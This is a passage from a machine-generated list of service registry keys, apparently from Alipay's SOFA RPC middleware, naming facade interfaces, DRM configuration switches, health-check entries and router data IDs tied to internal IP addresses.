AppConfManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofamesh.sofa4RpcMosnClient.facade.Sofa4MqFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.malgo.common.facade.OraConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.TairToTbaseSwitch.switchToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insofflineinvest.common.service.facade.service.InvestChatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcbenefitcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.RoleQueryFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.MdpModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.NotifyLogDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcinspect#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.jiuzhou.facade.WorkflowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.envcenter:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-finbatch-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:selectcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.client.SystemAppInvokeService:1.0:openexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.composeimg.TemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.WorkFlowManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityexprod.core.service.policy.RiskPolicy:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.246.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.BlackListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_ACC_BILL_ADJUST_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdabombardier.common.service.facade.relationship.IotDeviceAppIdShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.myddsDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.148.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.common.manage.facade.api.AppletGrayManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@caprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finpwm.facade.sceneinvest.starwish.api.StarWishUnitedAimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tscenter.common.service.facade.EdgeSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.config.LifeAppConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.config.ServiceSceneConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.org.RealStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csdatamng.common.service.facade.api.FactorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:payacceptance-asyncDelayPay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.ForestUserInfoQueryService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.linka:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.darwin.common.service.facade.api.AutoInsightResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayConfigGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifiedlimit.facade.UnifiedLimitCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.userHomeLettersJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.199.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imerchprod.globalsite.facade.api.merchantcase.MerchantCaseLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:morpha-cicada-ide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.26.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanlend.common.service.facade.api.consult.TermFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtaskcenter.common.service.facade.executor.TaskExecutorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:taskCreateExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:iliquidity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.blackbox.BbAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.echox.drm.EchoxSpecialDrm.deepCloneType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.messagefusion.facade.api.PushQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.combmng.common.service.facade.UtilService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.LargeSignAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.dataswap.DataSwapConsumeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.SignTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.tabQueryFundAssetDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finasmcore.common.service.facade.pcx.service.InterveneManualFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.provinceAreaMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.40.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insbffweb:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_O_PROJECT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.discountRuleConditionName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rcswitchbase.facade.AssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:creditexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.RealtimeExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.osprey.service.IViewTokenService:1.0:viewTokenService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LIFEMOCK#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkloanmerchportal_syncProductCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.assetapply.AssetBindShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.109.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.ipay.idatacontext.common.service.facade.DataContextConsumeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.abnclprod.facade.taskflow.api.district.DistrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.PublishDashboardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.cardcoupon.OfficalAccountRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.capacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_PROJECT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilepep.common.acl.GrantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.MessageSpi:1.0:authcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcreditsentry.facade.PromoCampCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.insmobile.drm.InsBlogDrmClient.blogAccountId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.AppPreTestConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.AttachmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.fund.cfpcenter.CfpQueryFacade:1.0:auditprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ipssconfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ifxposition.service.facade.position.PositionCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antsecscheduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.securitycap:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.amldata.com.service.facade.api.RiskFlagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echannelcenter.common.service.facade.EchannelRouteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icertifycore.service.facade.api.biz.VerificationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.service.DutyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_PAROID_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:cstask_userHasNotSpecialMemoProcessmngCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterMerchantUnionDrmResource.staticConfigInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.ctuevent.EventStoreConsumeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbshopdetail.facade.EleMeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.CaseSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tag.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mwealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:authcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ucdpmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:bankCardNumberValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.135.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:assetsWhiteListPublishProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.facade.api.clerk.manage.ClerkInviteGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.OpsChngTraceFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.PhoneRecordFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.budget.GrsltProjectBudgetSubjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.LoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.usercenter.common.service.facade.operator.OperatorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.baopoint.api.BpdtransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.api.DecisionStatusService:1.0:zoloz_stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.settleUserIdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsecu.common.service.facade.api.estimate.FundEstimateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.eworkcard.EWorkCardGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartscene.common.facade.schedule.PlanScheduleShiftService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.core.schduler.service.TaskRunningInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:findatacanal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:fcfluxnet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarguard.facade.TestcaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.asset.InstAssetAckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_PRODSWITCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialcore.facade.process.ProcessStepFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.promo.LotteryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.31.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:unitradeadapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.drm.CommonShareDrm.profitDateGrayOption,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcactivitycore.facade.play.group.GroupOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.withdraw.api.EnforceCloseWithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.monitor.MonitorlogAccessinfoManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CSSHIELD#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.87.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sdaclouddevice.common.service.facade.devicetwin.DeviceTwinQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.ShopAndMerRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.lfc.LfcReplyUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.AppealEventOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.igpayrouter.common.service.facade.RouterSpiCallback:1.0:aps_out@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.protocol.UserAuthProtocolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.merchant.common.service.facade.MerchantCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchservbase.biz.service.mrchooda.facade.OodaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.84.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:communitymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetpreference.api.facade.DueDiliReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MAPPPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.facade.TairCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:retryChainApplyTaskSplitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.core.service.check.FundUserCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.LocalCacheManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ioteds.metadata.repo.api.MetadataWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.news.api.channelnews.NewsDetailGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:sdabombardier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.StandardVoucherClaimCallbackFacade:1.0:apStandardVoucherClaimCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.event.service.paas.ServerlessPaaSService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.biz.service.meta.command.reset.P1p2ResetCommandService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.service.facade.fetch.service.EcoPageFetchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acauthcore.common.service.facade.authenticate.AuthenticationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.etetestcore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imerchprod.module.merchant.facade.api.migrate.MigrateEntityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.common.service.facade.api.VoucherEncloseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.171.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.debug.ChangeServiceExecuteDebugFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.alertGotoneServiceCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.134.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.defincustomer.facade.api.user.UserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:dwuniontrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.std.FileUploadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.resultwrap:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.benefitcore.common.service.facade.api.BenefitContentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.coopr.common.service.callback.CooprCallback:1.0:supportProdCooprCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CCMIMPLUSCHANNEL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.common.service.facade.agreement.KatongAgreementService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finprodaggcore.common.service.facade.mng.tag.FinprodaggTagMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.RoleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.baopoint.api.BpdtransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.money.TransferInstructionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ChangeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.geaexplorer.facade.aggregation.PlatformAggregationManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yfd.core.service.dm.mng.db.DBOperateCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.developertool.facade.resource.DeveloperMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.zpaas.zappinfo.core.service.transcation.TransactionLogConfigDrmResource.typeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceQueryApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","meshyopt@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.recadmin.biz.shared.manager.AirProcessManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.interstellar.common.service.facade.api.HuabeiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.withdraw.WithdrawServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID